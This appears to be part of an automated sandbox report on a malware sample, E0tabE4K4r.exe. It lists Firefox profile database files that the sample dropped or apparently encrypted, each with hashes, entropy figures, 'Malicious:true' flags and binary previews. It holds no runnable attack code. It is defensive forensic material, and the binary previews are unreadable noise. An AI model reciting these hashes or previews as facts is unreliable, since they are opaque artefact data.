                                                                                                                                                  Preview:mozLz........].]p....8.|3...d..pA.o...,.g....m..".]............+......0...l...p.&c.....,.iV8...7.}]!v....7BiZ...Z v7...+..+3..K.D..]..(.Du.........P...%...Dw;.. k.$......3.O...q.8-..u....l..q.~.q.Mz...R.."..&y...Fy;.1..O..3.c.........s.MC.>k..t+E.>...gK..@=.Cas'...K.U.$..7H.wQ.+.Z.zB....T.X..|.5{..K..:..F\..A.c....P...>D.w..x.(2..|..+.#v..]...~....m ..V.. D.Y".E..J.E.tHE...N.8..E&........P.;..P...3.bT.\.^..a...?........*$..-..E.'Z.......`73.?l..`....'.J0.<@X..Y..._$.m.....+...VT.V..MO]...Qe.....J.v8..r..ZT...8%@..F...Mb..J-....I.`..65.5;>..[.H....m.+..8......<...[...(..{....9D*C.NrW..<;o..j..f..OH..]...../..0).O.YP..m...^>.:.4......+B.}.E..\....h.....E.Q..<&J..."M...6..I-.#E.: ....@z.+..`..x.<.X.?.Z.8..0..b._...?~.3..??.q.o.W.....i.5....4Snz..;9U.|[.....Vl..q....t............h...8.|.dS..o...b....kU[a.....(.,Mue $........:......V.*..I.....!e....2....L].4...Q.6..(...].......v..Po....w!.?.g.1.O..7...u...~j...c>.q.........p...O...!% .2

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\ls-archive.sqlite

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):131406
                                                                                                                                                  Entropy (8bit):7.998798934542004
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:GKj9M66QEGcwSIBF6P5aYS+O2dfnXzW7cKG3gyU:j9yG0PpYmfnXSwKGQyU
                                                                                                                                                  MD5:2D5BA54741DB7CECABBE4968327C9432
                                                                                                                                                  SHA1:A225170AEA16B8B87D3CD549225BCAB41C76EB95
                                                                                                                                                  SHA-256:C0763842609B50E21530F0B9243F37088B65BD54C49826892B5FB84D57A6AA0C
                                                                                                                                                  SHA-512:9EE908B7E53E0246AEB033D904BAEBE9045A330DEA4B33B17DF03855428799DB067DEAB24A2955F5084485C7AAACA8E22B52737925DF9D25ED9B665F18957E39
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit.....X_.....TQ..C.4.zw..Pc;>.:....2~ |.o..7...{7H.S..&....A.....&......-..$.....A.L,.y.1].p..,..{.$.~..4...{.w(.~........Z.tHU....gXux...e;..i.(.c.t..MN.z...b5....`]. .[l...~h...f+.; ...O.[.#<.N....1Z...9...{o.%.H.z\.HwnO...(l....}.Q....2.......aA...v?Wp#...@2...^...Ys.v....K?...I1uu..k....>..V....y0F.=..:$.... ........?....u. .+@^..a......wO./N.s........`..uc...J.....~.7F[.L..:V..Z5.9....BW .z....'.UX\...o...2c..rr...q0<.....4...t....m.e....]....;2K..8k.........K..)oC.6..2.s.......?..Cc.......U6...< .H...J.^$.3.p.Q...3..6kX..R.z.....9......w....l.[A.,..>..x?..1...>g(.hn..=;.c......v..P.c.>.6...n;.9U...4>.........e..P.zt....d...i.s;Q`W. ...WXF."m........b..6.1.R.......r|..M.u..W....;p.5.Au.Rq....;...R...lP.O.[.M.6.).z.S..R(..qF.x.u..%...p....:Y..J...5/...o.*...b>J_.,....+.8,..%.....C.$&xd.V.s.A.)Z..q..*..-...'nT".$.v..+....d.l.6e.......1+...../...($.....b..#WC..6.\..F..e%2ZAYX.?P..9............_]X.|....M....o.Y...#..EP/.)E

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\.metadata-v2

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:TTComp archive data, binary, 4K dictionary
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):370
                                                                                                                                                  Entropy (8bit):7.347384418834313
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:QuZUOlFfdOMFG5/Gr5tP5XDvOm2BWhiJSAEhTcni5V85zbZItiW/SWjx7nIS1WdV:dOyFfIl/GrDFiSAaci5aBIEsISUdNciD
                                                                                                                                                  MD5:D4196409D885C2154004B9479FA6D423
                                                                                                                                                  SHA1:4874B81344802E2BA79A294795F9E78AAE320774
                                                                                                                                                  SHA-256:6C142F41DDD81342F661089C9D94E495AF9798C55382BBCC67F4359A0A38E22F
                                                                                                                                                  SHA-512:307A217535968DB3D8D55C34C1C914F7527A776A19C6652005C257273449DB9D58F6247218ADB2B63D64C2A717BCCB519897E78BE7590DBF08E52DE7D306F256
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....J....>..i...4..D...'.lvhw<rewa+ .3...:@._.....8,..Rh......A......a....$.&.H.....g..A.I.Dt.S.p\...9.<...[..Mfw.hj..|x.....{.e..z.-$79.....x^....`....n... 4......\x..k...t..5...mc....#.......j..C.]...(I..8f.y.).k....b>..|.....{5...t.X..u.f....i....D._..1?*.e..s..OO.n?u3..fmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49486
                                                                                                                                                  Entropy (8bit):7.996029129888508
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:9JUZnWuPdvS4tKJWHwvqWWMx0G0vc0zTcniM:JCN3KUHwvFxjs1nM
                                                                                                                                                  MD5:C02B62E1ABEFB32E3E38D7AC1DECAA8B
                                                                                                                                                  SHA1:273E2BC1960C3CFF5BBD57AE0140DF44FD70EAB8
                                                                                                                                                  SHA-256:4E540E09F7A66DDF46C683B167A53E7102F300B7D7805E3E1614F93F92D62791
                                                                                                                                                  SHA-512:E70D6091347E2FB258EACF9501BE0DEF5EF6439393BF7A604A33F6730A11C32670636E991669126A32888301134D026CA68E91F0E43EC98852F17851265C3284
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit.m|..l.<T.~.%ODI$.n..Cy.5...G.p2u7._D...w....@.....nO~1...S...........".....&..YFV..k..6..).oHh....|....0.S..U.S..|`.dE...;.4......O...8..}3!3.W.ET.?.l._Y.Z.......-.3.WPoT.x+.W*.....ia.....!.!55..c.D.lH..8M...H.Pp.cr........N......'w.?&.g.(.G.qX@B.>....).\?D.w5..c*.q^..~..=Y[ .....Wa./M...j.H...c.v..(ow..8..[9.q.h.9U..9.._.....|=bmF....\[.T.0....x7..$........F.*{1.c.y.....h&;.\._.Ao+...h.%j....YP..=.i.....].\].8.u..=.....X..0...".kO.....;...*...Eq.N....J..s....].Ks...P).U<.[..J.,...F.mCs.3..9.N.O..m..A.gI8.m%e\t<........,1..E....u3V..[.+^O.9wB'.]...1...Y09W.....eb...p.c2....5.ft...(.Y.JP.ym..gl...Ly.?.M..e-..._.Ou.T..H.?Y]...{..p.z..q.?...}O..A..k9Z.\....(.2.iUx.A....P.....0._....v.......8.v..$4F.-O..........]..wF........E<..^.J.2...[................\nxx%1(..G......{.^..[..g;...*p!v!...!.`w.G...7J...?..e..w.+..rZ..~A.{.9...B..'....l.>.l..]."..R.2....fW3.......>....<..VtrK...38K.R-.k........A..6..8...Ft..M..i.Z..q.F...a.S..Low..".

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):33102
                                                                                                                                                  Entropy (8bit):7.993714579116142
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:ctLtQY4Ws0ar2rnj9z6HU1sp8+54bSMbFh1j5e:6tJE0/rnBziMawbFhtM
                                                                                                                                                  MD5:09C9FA46AEF34B7CF12C7FB6A83BEBF8
                                                                                                                                                  SHA1:DD87978AA0AA8B925C24C7AC4911B7130BB52D1F
                                                                                                                                                  SHA-256:43C46E2904756617D1527B21B6CB592B8475F3C0230640221B56453072B52E10
                                                                                                                                                  SHA-512:A20471BA1DFCB587AC0A733E3B119AF67AADBF474A2BB3E0F7A8F51386F81A03C4FF3DC5271A903CDBE232A34817DF2372D6203A6271D7044DCFB0485A3B227E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:..-..1.3..D^T...J.%b.fVB^_.p..7.&...~...9...o...O.+.J.F...^.Q. N..LJ.A.w....c,.d...........D>h....$.Ma.?.:$k..O..}.9Te.....hZO.....+..'_...W..u..Pl..n...i24.m.`.%Q.Kp...y~l....).>H{....\.S.ax.|.^.....Q.v.9.c...N...........M.C..F>Z..@q.A.f...rL..B$.O&..i....8..2.pyu...;#N,8J..P.4.'..a....=wt._v>....r0..a..P~M.....N..g.v.J....4o.....g..m..............cV.7.....0._....,....Eiy..B.+u-C*....$...r.7w..{^..r.....KbnM? ..q..~.Y&.p.?...M.#e.........vmF<qF9.T....\?.].....5t.+...w.Y..3.'.BK.'+.~e$...=...7`/..._WM....q/.?.Z....x*..j..a..SQ.$.h...o....6..j..*..W......F...c@.~J...0.u.'k...l..@l..d.U.A=-..X..k.m...ob.3.-...K-.....)1...r.Zig.....=...c.=..v:.o.<8..b..$.%..=:{.........b.<hB..C..[..W...T..s8.TR...M.s....9p.1'..I..c...........9......c...$Bj....!n....$.y.Z...f.z.rl68$/...;.xb.&$..~.....2.Fc......|.R.....R.FUn[.ce...c.....i9.......q...R.C...!.8......Ag&.."...k-..\kX..B.iU..o.Sc.`..H.L.o.*....l..N.#....q...v.h.m.q.sL...e..[Ga....RB!%.z..K.S..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49486
                                                                                                                                                  Entropy (8bit):7.995934776726119
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:4zzYzVLzFzganD9LyxiKaCz08ehcZQFJoTW:4zzYRHFganJLytLA8eQQFuW
                                                                                                                                                  MD5:6DA8792BDB69D4C5271FF250FAA1226D
                                                                                                                                                  SHA1:C5C6475EEF2069D522771EC05CF92A50A5BD1720
                                                                                                                                                  SHA-256:9E5BB102C91C3BD461D562FA3B417351BF4D2B9D6442CA3EDDAB695C69A5BEF6
                                                                                                                                                  SHA-512:0C9C4252F40015E7B2F6F59492D50B22CB1418ABD6ACD353EF01DDF37AAA5FB1C02C6D7078A50C89AD384FCA2ED3CE95D2ABA7D9CC4BB57894E003A8C670FF3F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit.z....c.........W.h.;.O[.oT4w...c....h~...g..}.^.U<.....ac..<J..*.9A..*..7.{Rh.:.G..M..TH^b.2.....F...\...U....jim.....Q.\.+..5rD.W0rnGU....x^.a1.......!.u.....W...w.....4.n..&.p.U.N..`......L+g.}ba.K,..r..X.L...z....v.4=.......i'D.m2.F.S..d%....3...[.....F.OK.n..)!....%.V.$..l..ts..#....WM...D..J.0.@.....v.j5@L.../...R..,.%...ssj.m.KT...2..s_...r.Ff..Y.B28:.q.K...x.H...P.@;...!..<:%...............l..U(....y.3..).{e..,.S.e....a.8...[..u.o*.5.ip.......~.....,......1...;K-..e.S.-4.`....t..R..|..|.Q.1%t..#7...RE.L.U...u.I#{.V...ui..z.a..y..G.../......x....H.%...L.o.......%....f.4..].X6.%.i.m.>n...P.6C.;....W.[.4.S.f4..e.U)..)....U.!..?..^..7...'Nb......-...!.U...d.S.oS.z.E.}..~9.........4]........?...8..t..uE.S$,;>g.......@.....J..k9.e...'R....*.X..L~.\'.c...O.3Ex.$..*.. .g.d...d..U.Q.Un......:..3e.....=c.c.P.S.z8(..2.[>..c........-t.....Kv2.!..*....#..u.%~.....t..eU.........|D.OC3.4hI.,.P.&.4..h...+:..v......_).C.\.p......

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):33102
                                                                                                                                                  Entropy (8bit):7.994489956865216
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:sc8T7bLK8AGsKCCjO37Eyj71Idch32UKBefmf2A7nG:583bnAGjOPjxIdcc20b7nG
                                                                                                                                                  MD5:1F0FA45CFF00933CC314E96E32F6419B
                                                                                                                                                  SHA1:F14AFD3F76A6D1940D0868282164F19F7E315C33
                                                                                                                                                  SHA-256:41927F285716C4C87E64BF398B3B9DCB86B9715588D369149325D3DE3F8D46EF
                                                                                                                                                  SHA-512:49B03D57BA3BB563901E873C809D0B599C8472592017418D820C0CDA3F25D90C3D784807CDA2DAB383BAD43A00034C313B5F3ED01C7C979CD786205E32B1107D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:..-.........&{>b .8...?l.9.....El...V.6....I.2..../..O|...q}BA.$....QWf..r.;..g7..>.....=.h.G....&...-....j.....&-.[y.dZ..1.[........,d^..l$..j>.E..`.d......6.....T.8.BL.... ..+...."..Q9.O.M...5....{.._......&..fl.Pj.......Gf.&.....E........w.........W.....68$=}.L.../_[.,.I+..+C...h..<-..E.j;%!.3....&....1....t.j...O..........T.W.....Qw.[...&......6.E.`.A.NCM...a|.#'Z..xK.....S-..H...c..{..4.y.O.p...zp8.'....D.5^.....Zm.D......l..HU.....Lc.9.@....Mh..........wn..e#...........F#.u-.A2d.{wy..oO..A..vwas.K...:....O...Eb?...Y..O..l......;..S...1.r..7)...nB....G.ud..$.?.|p5du.;........>'&....(.>0...Bf{...:...]....p........cf....\..k.a...E...3..A..M....Sf.&...A.o.v.cB..H'T.T..@..\\0P......T|.Rf.vw.6...=@[...^.~..s.!w6.b."@g....-0.t..LpA.....9..0.+-M.w~.....B`..d..EL.3T8i....T..a..;!....P.\wL.Y....>....u.0.X.^\OV..>.....W.."..........G}........\.?c.........%. I..x.gN..Lp.D]~.5..V9....{....>.s...@.......~..$.....=....TNA..Jo.v@.w.d......2..........

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49486
                                                                                                                                                  Entropy (8bit):7.996560298475666
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:fHG/DSHaZZ2erUUJhO4Z4WTGUkN6C0rlqFN2jwxWjhMuKnd2DhiEwU7N5hkO1EIy:eKANrthO4fiwUN10tMuzVbZxrk+PiF
                                                                                                                                                  MD5:9676D8CC99B2E1A80274FBBF824D2BD2
                                                                                                                                                  SHA1:1621976436D203030DD4C4064F452AE4C2680802
                                                                                                                                                  SHA-256:22B8435824394FAB049DE76907C3F4A27F17B7EB60D00D9355D00E23933FBAD5
                                                                                                                                                  SHA-512:963F59DF40664E2C819FF300D0E5475AAA1394432E0B87DFE61A0CAADE89783A64E06D01D5973114EC5917B01311D70202784DCF89DB0511A0374ADA1226C7AF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit...L{58.U.....7._:.g.1c..Wr..!.a9.R..z.t*...=ik_.U...|A..........vg.....r..}@q..J.x.......eN...+......M.~d?......B...B...7...u&.....").v>..-z.s....-.y..\P.!E+..a.kO..n-rx....6.Imzl..J.oM.jD....H....).\g'..L.Yd...P..CX.._.....`..0..b~..+W.!...{..#Q....uR......=%0."..b.....S..U.g.L>...2:.O...m.....!Rp...Y$..NG.?...\...m.2O!x./.<Kf.'...k. ..?..m|Q.Ax-.".0........{r..B...v....R././....Q.x...<.c:.}".Z~.....Y...(...W..(....B.j........s0.]..B..~.f.Ud\..a...p...7?....`..kiM.\..Y.q.iE<.)..m....<.S.(q5.|p.Qn&............>c...x......._.....Yq#w...&.J.G....1.d.g...BJ....-d.I....Gl.?..2.Wy..q..C/5.o..o&a(.-.e.m...|..q%^9e)W.P....e....h.....Gr...Zm.v.....:9H..%A.Y......."jBr`."a.+......N.G...N.U..TN.s[Y.5.>).Y..._o.t.M.N......d.C.....j......-..C...q....b..2..:....d 3.Z. ....L}:+...a...n.X.....9..O..n/f..A.l.?._.......a....hz...U.(..Jd...}@..u....O..7dt.y...r.&..b}#.w...g..'s..Fy....*...4..$..]...[/..$...&..F....Q....4wH3.4.rJS.H?..:...e.tR.12_....;..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):33102
                                                                                                                                                  Entropy (8bit):7.994197222470759
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:k7oCn2nuVKCSWc4OG2VwZM+dohsGJVuYMfGZ6Ptk4UClEO/cb2u:k7oCn2nuIRGfYhsGnC+MPtptEOUb2u
                                                                                                                                                  MD5:D5B79B4265C139CD64FD3E8CF13B8297
                                                                                                                                                  SHA1:1CE135ADB8831C5F2EB65CB19CA7CF971C3A38BF
                                                                                                                                                  SHA-256:345B684494ED377ED3C3A949BE25EB6FA4991FB1A517966865596A95EE9A4BFD
                                                                                                                                                  SHA-512:84ADC009CBD4625A0D6D531B594755D727DB0C961F936B7035A5003F639EDF4D890C3902B9AEA706E1AFC7C35B62446E7ABA67BE34F07F0A5A36A826D9A8B495
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:..-....o.i..L(...........X..lC....?....w...L.u5..lNXG....b ....;?(j7N..0.y...Z...Sb..'........./...)..!........."^vl...T..[...L....Z9..; ....(.vn..VNA.....!<....m>...bm..P...g(.....B.z!._....@..f.}R.krB..b2g/.<..`.bs...Y..X1%^.U..e.C.Ot.{z|..c,.fr.^Bg...Ha"..S,,y....XM......m....6.....{.c.3....y}X.o.s6..oE.....).2.ui.?!x...U.....x.|A../T...Y...y...h.r....d.'..3.W.......t'...}..Sf.m..K.o$.....C......)....^Xf....r..mC^........g...f...U.}_.e.U[.#9n.@.1V1.\ma.C.W.....Hp.D...{..|.;..8.Y..8......54.....FR.H..cP.O."...-...[.0c........mp......~.. 9....<^.'`.;$.*,..).....l.}......K ..6.*.,.. .f...ry>..~!.y(3DK........*.n..'.YU.n.".....T....H..;........@....z.|..j.....N...~.s..._.Z...3..c..=.H_..(...m4.[.[..q..#..b..a............}.*&9Zv...F..gP.a-.\.)W.<..K..Xq.+9ou..B1D......H.pO.6....c..;.&..6K.....A.4.T.At!=....)...y.|Q}..K.H....T@..}.i...1C.k.)...)..r .........F..DU..P..4.....~3.....Pf.\.o..G..L.L.{....Z..........xq..C..vUk..B...2.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49486
                                                                                                                                                  Entropy (8bit):7.995625072776562
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:zokvmYpDStBxpWcTKS/O12ntISg5FYjk+SAsXwIA2lXZuKw09UB/RlG7mWzNQqqA:B7StxvejA+SrKAEI0uCUZG7N/p
                                                                                                                                                  MD5:0C17F56FBCDDF2D8239CEC12773F6F8C
                                                                                                                                                  SHA1:D1035EBFA37EF3D4A9FA290E67C9FCD2F30DEE85
                                                                                                                                                  SHA-256:4127A35A8A6D7E7E7A69E2E832BC7A1F21EC1B7F82DE79CCC995168E1E8905D7
                                                                                                                                                  SHA-512:FCCB2E5C8DFDFFD57A245DAD2479163CF8EEF3144F457172D544B670967CB508054EF784D8E8B4A0F43ADB6EBC2BD2F894150D4C8BBB7DEA6C8A391F4DBCED4C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit...).?../[.1z..X...K...;K.V......K.`..D..j.A.J..a...QJ...W/[u.&WUe}dqq..5N.FWm.G..@.t:2.jA!s.`@.'.L.B+n.Di..q...6.....3;.]?|..[a.N[5:S....I...K4r'.l....GF<..&..Z...l.........t....F..Os...#.&......e...E.iwq8..?'...C...|....x.Ush../@.@d.%...e8.V..z..z!.A].Lu.....^.a..S.1t.B[.1.....l./.s`.J;.../g...Z.=..<...g..a.>}.&..;p.(.xuj.V..7.........../..lH..N.z..m..v...{D........u..)N. ...x....2.j..l...Z...e/.:X8.2N._..j.M..K.Q.....o_..J....4..;..5.~....._...9...0'..[~...O.(.].~..5.......{P..&R..".`;g....T.a<>.FP.*....W....h.N~........W.vX~..V.a.7l{.;..8..!.L....i.......W1.R..m..d.l_q..%.......O...........J5y..mAnZ.....Z.Rz.3hJ............t.(/..!..o..A.D..L/..->.r.1.."0...%....J...s...=a.Y....{: ..H4........ ....}.D.M."..1.....!.Q$I.w....v..V8..qI...C....Tw.%..\.[^.....(t.7+.q...2.....)j. A....r<.$.'..C..).uCcg.~?.c."n..}|D...._x..Pb.4....F...1..Xh.e....u.....T.9%.2.n..3....B]sD..}%..c...... l...|C. V:k..%)...I...Z....A/..!.........S...E3..h$.mz..H V!.l.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):33102
                                                                                                                                                  Entropy (8bit):7.995100501489045
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:g/hSVV1WYHb5tqHWq3oTai96Tlxjuw41WoGnIkmog:g/QV1dHdtqHXWa1TvG1Wmog
                                                                                                                                                  MD5:AB2960BA4CB737CE6B88F67E0103478E
                                                                                                                                                  SHA1:3DD18B2F246203BC24598BE07E281457904E0A5F
                                                                                                                                                  SHA-256:7675BFBAD758C14E6AF5989BEF25438D04709E7EC2D31DF6ADD45AC4F10AA7AE
                                                                                                                                                  SHA-512:71DB1B9A40B51D8B512A63B06A12467ADDC1851B21747F45503BA6D0D4987EFAB0BC3C1E8B57135CE37A58B70944E073D46007CE1BA4D774F39AE6393ED70029
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:..-..U.._......5dz&..t.3...+......N.j.r.}4.n....#......"..'&3M].GW'-{..v.....Xt......\...l.D..{..L.O^..W.:..u.f...GI..g.qQ..uH.Q..%s..s)0.z.1/C.,..sOf.>.3..|7....BcW.w.c..Y;@Kq..C......Vk... ..P(......|..G.~...#...KS..\%;.x..=.[...%..G.N.4..+>...<_.V.Y..RxJ.!.*...k.....>E......A....r?y...s..H.W0...DeY.+..Uv4eT.7....#....> G~..v..i....iy......8.b.A.u7.L....V6g....gNV... c&.....j.....".2.;(.....Z.e.+|..o.A...7......v.1..g....>X5U...a..cC~..!-.T..].LF....6....5.V..hk./..=.E.3..AU:$..a....ig..64..).....V+lv...v...4....x.>...?..`T.Jf>D.....BOiF...^.P......u.6.s.:W.....<............._.<.FP:C)..n.Y......G.....`6{~.....l.ds5.!"Ma{.Y....\.v\..%D.1..H[P>w....E..g.Z......7...._..V!...g.N.~.:..............j.N..a.M......,.+..Sn....#...J.^.Q...R.G.2.....T..=`-.....g.Y.Z..@.<.a.Na.D8F.rM.j..'e....<.%E..c...}..z|.t(.6b..[......vC.U..h....,K.3...r....O.&.n...\y.^.yp.L ..g..%E.=.i.3l.@.pQ..6.E........swKg....+...9:....p....M.%n......;.....j (...'i.......[.$

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49486
                                                                                                                                                  Entropy (8bit):7.996752750286726
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:xgpyvd7XzW6xKYS0ajL+yjRsvKkxr2gzJdqkvYTjmn6Yp74D:xgpyl7jWwFyjevKqK5TOW
                                                                                                                                                  MD5:FF46F0636717B1EEDA8133CF94D40572
                                                                                                                                                  SHA1:83CDC07B845AC9EAA3B9A73ED5F6596B8CF24DD7
                                                                                                                                                  SHA-256:78D65437D43D75484CF07B9369B783BB29F991126DE718C2A161293C7A05C7D9
                                                                                                                                                  SHA-512:B3CEA4194E775127FE235F084F86B941218608939F5236B04D63B575194FBA7AC901B70C143FC90B4A7F5D7F422E9687B8997DBE66E2D841EC5E2A8EF65FDE52
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit][....+.,.f.?j..J}.g.e.y.............Z.'......;E..Z|.....R..M......*&................G....Se..Fh.xu"..............J..>..$.YI..n`..V.cg.b..&....q..g..[Qp..xD..0g....s.R.?.VA.&...+.c.S....($0....T' ...[kJM...'..Ni=.~p,..Z.%.;.s..N.. U...`7u;>.....^q8Dt.}...J.x;...h...?.q...d....mm.{....y..;.'P.f{g<.+.....|R..#..uw..F.....V..~..........(.7....5p.........}.B.......?!].D.......L....{.Y..... ...%M?_.ik..|~@..0...u.K..@)%....o.~_x...<.=..E.).(.(O......[.......X...Yp*Z..t..G..+....._..c..X.....2h...J$..%........_G...A;.+PUo.J.R.GS.....KH.o..f..o.o.|..dl.J.d..v.O...mi..7s?...@.y.......l#..qz.P!.......r?.L....x...!...o8!..h..H.:..yX...........3poZ.d... ..NVN......T.....LU....OD...... ../.....\......I.}..S..6F+.4]..b..9..Ev..&%.{.........y...t^....[R&..,...2>.I..<.c...|..b.O.'..E..... L$II....x....P...:WV....n..5.y..:...}.J....4i..rWn.a.....j...,......'..9!.H.Li....M..J.4.S...(@.E.w.j.h`...4......@..Og.(^TY.^.5E....p....V.6.e'v.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):33102
                                                                                                                                                  Entropy (8bit):7.994290797430439
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:X1Wgg65DYYnOAEp4uWT9cUNcZ1RWcjnOLZatpXl0Gv5rZl:w+5DYYns4ucitLOlqlRvBZl
                                                                                                                                                  MD5:54AB7ECF21B95F1BE2BB3D2F9F7ACD8E
                                                                                                                                                  SHA1:1002BCF6DED4D62361D55F1CDC7A1458DCA2F734
                                                                                                                                                  SHA-256:D1D1D5F1C6831D635B8076799CB5468996A2CB5F02EEA5488EC10056D7F45755
                                                                                                                                                  SHA-512:1DB58DA2E7A0B10FCBCC133995FD4BD00F27D429731A36A22A877311113B45C3842538093551E46AF2983BF3280B70A64ACF0BDD546AC6B64834C3030F24EBFC
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:..-......)......b....f....T....H..-Z...&.l'.,*"l)>QjO.._..R.}<.z...){h.u,..).(R.....k.0......cmCQ.6\..$ZN..P=.a:T...K...f.&2...k.....d.UR..O..d.k..S....9...z/$..T.& 5]...IM.[.`...d...@zd.Fz..H....~.X{.A.@...../GK.X......F.........8....d......]MLX..<.U...t...bE.....T...B.\......l .@.....7...cxC...J0.=T.8....1....S..!....1.3r9.6(.5yC......5...P+..d$...(...aN....k&........AP..M..#.[U..pp...x^.G.T....<..4t...W.N.Y.W"....$..#..j.G..m....H...X.6.Q.........`k<.z..i6@..D.[.".)X....C..Ng..nP.t...g..0.......A./..Z0.N........%.M.e..Q^...p..m..y..<.A..Dx(...]..A........4N....\./R#S...Y:.Q+ygGn............\.dX.f$....^....IUPu?.....>.h...|..k&....e..<8.*a<.T.....|A..;Z{..8.....a...V...t.<..a..y.,[m.....n.x....#.%.9...n..,.B.w...%.i.uJ..........!..{j.=.2.S.9.O.D...v......r.....#.Ys...0e.S..d......cjh.q......5.ZAj#.G,....I.Gx0ez...Q.R......h`aN....'.>S....n..$.k......N.G.5..3.h.DEU*.9.^....K.B...D,Q.)V....]R...V...o..m..../Q$%.x4.I.........p.`..V./

